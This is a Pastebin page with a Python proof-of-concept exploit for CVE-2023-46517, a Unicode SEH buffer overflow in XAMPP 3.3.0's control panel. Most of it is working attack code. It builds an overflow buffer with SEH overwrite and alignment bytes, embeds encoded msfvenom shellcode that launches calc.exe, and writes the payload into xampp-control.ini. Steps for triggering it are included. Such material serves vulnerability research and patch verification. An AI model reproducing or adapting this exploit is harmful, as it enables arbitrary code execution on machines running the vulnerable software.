Advertisement
FlyFar

XAMPP - Buffer Overflow PoC - CVE-2023-46517

Feb 22nd, 2024
1,149
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 5.33 KB | Cybersecurity | 0 0
  1. # Exploit Title: XAMPP v3.3.0 — '.ini' Buffer Overflow (Unicode + SEH)
  2. # Date: 2023-10-26
  3. # Author: Talson (@Ripp3rdoc)
  4. # Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/8.0.28/xampp-windows-x64-8.0.28-0-VS16-installer.exe
  5. # Version: 3.3.0
  6. # Tested on: Windows 11
  7. # CVE-2023-46517
  8.  
  9. ##########################################################
  10. # _________ _______  _        _______  _______  _        #
  11. # \__   __/(  ___  )( \      (  ____ \(  ___  )( (    /| #
  12. #    ) (   | (   ) || (      | (    \/| (   ) ||  \  ( | #
  13. #    | |   | (___) || |      | (_____ | |   | ||   \ | | #
  14. #    | |   |  ___  || |      (_____  )| |   | || (\ \) | #
  15. #    | |   | (   ) || |            ) || |   | || | \   | #
  16. #    | |   | )   ( || (____/\/\____) || (___) || )  \  | #
  17. #    )_(   |/     \|(_______/\_______)(_______)|/    )_) #
  18. #                                                        #
  19. ##########################################################
  20.  
  21. # Proof-of-Concept Steps to Reproduce :
  22.  
  23. # 1.- Run the python script "poc.py", it will create a new file "xampp-control.ini"
  24. # 2.- Open the application (xampp-control.exe)
  25. # 3.- Click on the "admin" button in front of Apache service.
  26. # 4.- Profit
  27.  
  28. # Proof-of-Concept code on GitHub: https://github.com/ripp3rdoc/XAMPPv3.3.0-BOF/
  29.  
  30. # Greetingz to EMU TEAM (¬‿¬)⩙
  31.  
  32. from pwn import *
  33. import shutil
  34. import os.path
  35.  
  36. buffer      =   "\x41" * 268        # 268 bytes to fill the buffer
  37. nseh        =   "\x59\x71"          # next SEH address  — 0x00590071 (a harmless padding)
  38. seh         =   "\x15\x43"          # SEH handler       — 0x00430015: pop ecx ; pop ebp ; ret ;
  39. padd        =   "\x71" * 0x55       # padding
  40.  
  41. eax_align =     "\x47"          # venetian pad/align
  42. eax_align +=    "\x51"          # push ecx
  43. eax_align +=    "\x71"          # venetian pad/align
  44. eax_align +=    "\x58"          # pop eax               -> eax = 0019e1a0
  45. eax_align +=    "\x71"          # venetian pad/align
  46. eax_align +=    "\x05\x24\x11"  # add eax,0x11002300
  47. eax_align +=    "\x71"          # venetian pad/align
  48. eax_align +=    "\x2d\x11\x11"  # sub eax,0x11001100    -> eax = 0019F3DC
  49. eax_align +=    "\x71"          # venetian pad/align
  50. eax_align +=    "\x50"          # push eax
  51. eax_align +=    "\x71"          # pad to align the following ret
  52. eax_align +=    "\xc3";         # ret into eax?
  53.  
  54. # msfvenom -p windows/exec CMD=calc.exe -e x86/unicode_mixed -f raw EXITFUNC=thread BufferRegister=EAX -o shellcode.bin
  55. # Payload size: 512 bytes
  56. shellcode = (
  57.     "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1"
  58.     "AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBkLzHrbM0ipm0c0bi7u01Ep1TBkb0nPdKR2zlrknrKdDK42Kx"
  59.     "Jo6WpJnFLqiofLMl1QallBLlO0gQxOzmjagW7rZRObpWBkNrZpdKMzmlBkNlzq1hZC0HKQwab1dKQIKp9qiCrk"
  60.     "myKhGslzoYtKMdTKkQJ6ma9odlgQ8OJmM1vg08iPD5yfjcSMjXOKQmnDRUhdaH4KR8mTIq7c2FDKjlpKrkaHML"
  61.     "JaZ3dKItrkYqhPU9MtO4KtOk1KC1QI1JNqKO9P1OOoqJtKn2HkRmOmaZjatMbe7BYpm0kPR0PhmadKRODGioj57"
  62.     "KgpmMnJZjoxDfceemCmYo9EmlivcL9zE0ikWpQe9ugKoWKcprpo2Jip23KOHUQSaQ0l33Lns5PxrEKPAA"
  63.     )
  64.  
  65. shellcode = buffer + nseh + seh +  eax_align + padd + shellcode
  66.  
  67.  
  68. check_file = os.path.isfile("c:\\xampp\\xampp-control.ini")
  69.  
  70. if check_file:
  71.    
  72.     print("[!] Backup file found. Generating the POC file...")
  73.     pass
  74. else:  
  75.     # create backup
  76.     try:
  77.         shutil.copyfile("c:\\xampp\\xampp-control.ini", "c:\\xampp\\xampp-control.ini.bak")
  78.         print("[+] Creating backup for xampp-control.ini...")
  79.         print("[+] Backup file created!")
  80.     except Exception as e:
  81.         print("[!] Failed creating a backup for xampp-control.ini: ", e)
  82.  
  83. try:
  84.    
  85.     # Create the new file
  86.     with open("c:\\xampp\\xampp-control.ini", "w", encoding='utf-8') as file:
  87.         file.write(f"""[Common]
  88.    Edition=
  89.    Editor=
  90.    Browser={shellcode}
  91.  
  92.    Debug=0
  93.    Debuglevel=0
  94.    Language=en
  95.    TomcatVisible=1
  96.    Minimized=0
  97.  
  98.    [LogSettings]
  99.    Font=Arial
  100.    FontSize=10
  101.  
  102.    [WindowSettings]
  103.    Left=-1
  104.    Top=-1
  105.    Width=682
  106.    Height=441
  107.  
  108.    [Autostart]
  109.    Apache=0
  110.    MySQL=0
  111.    FileZilla=0
  112.    Mercury=0
  113.    Tomcat=0
  114.  
  115.    [Checks]
  116.    CheckRuntimes=1
  117.    CheckDefaultPorts=1
  118.  
  119.    [ModuleNames]
  120.    Apache=Apache
  121.    MySQL=MySQL
  122.    Mercury=Mercury
  123.    Tomcat=Tomcat
  124.  
  125.    [EnableModules]
  126.    Apache=1
  127.    MySQL=1
  128.    FileZilla=1
  129.    Mercury=1
  130.    Tomcat=1
  131.  
  132.    [EnableServices]
  133.    Apache=1
  134.    MySQL=1
  135.    FileZilla=1
  136.    Tomcat=1
  137.  
  138.    [BinaryNames]
  139.    Apache=httpd.exe
  140.    MySQL=mysqld.exe
  141.    FileZilla=filezillaserver.exe
  142.    FileZillaAdmin=filezilla server interface.exe
  143.    Mercury=mercury.exe
  144.    Tomcat=tomcat8.exe
  145.  
  146.    [ServiceNames]
  147.    Apache=Apache2.4
  148.    MySQL=mysql
  149.    FileZilla=FileZillaServer
  150.    Tomcat=Tomcat
  151.    [ServicePorts]
  152.    Apache=80
  153.    ApacheSSL=443
  154.    MySQL=3306
  155.    FileZilla=21
  156.    FileZill=14147
  157.    Mercury1=25
  158.    Mercury2=79
  159.    Mercury3=105
  160.    Mercury4=106
  161.    Mercury5=110
  162.    Mercury6=143
  163.    Mercury7=2224
  164.    TomcatHTTP=8080
  165.    TomcatAJP=8009
  166.    Tomcat=8005
  167.    [UserConfigs]
  168.    Apache=
  169.    MySQL=
  170.    FileZilla=
  171.    Mercury=
  172.    Tomcat=
  173.  
  174.    [UserLogs]
  175.    Apache=
  176.    MySQL=
  177.    FileZilla=
  178.    Mercury=
  179.    Tomcat=
  180.    """)
  181.     print("[+] Created the POC!")
  182.  
  183. except Exception as e:
  184.     print("[!] Failed creating the POC xampp-control.ini: ", e)
  185.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement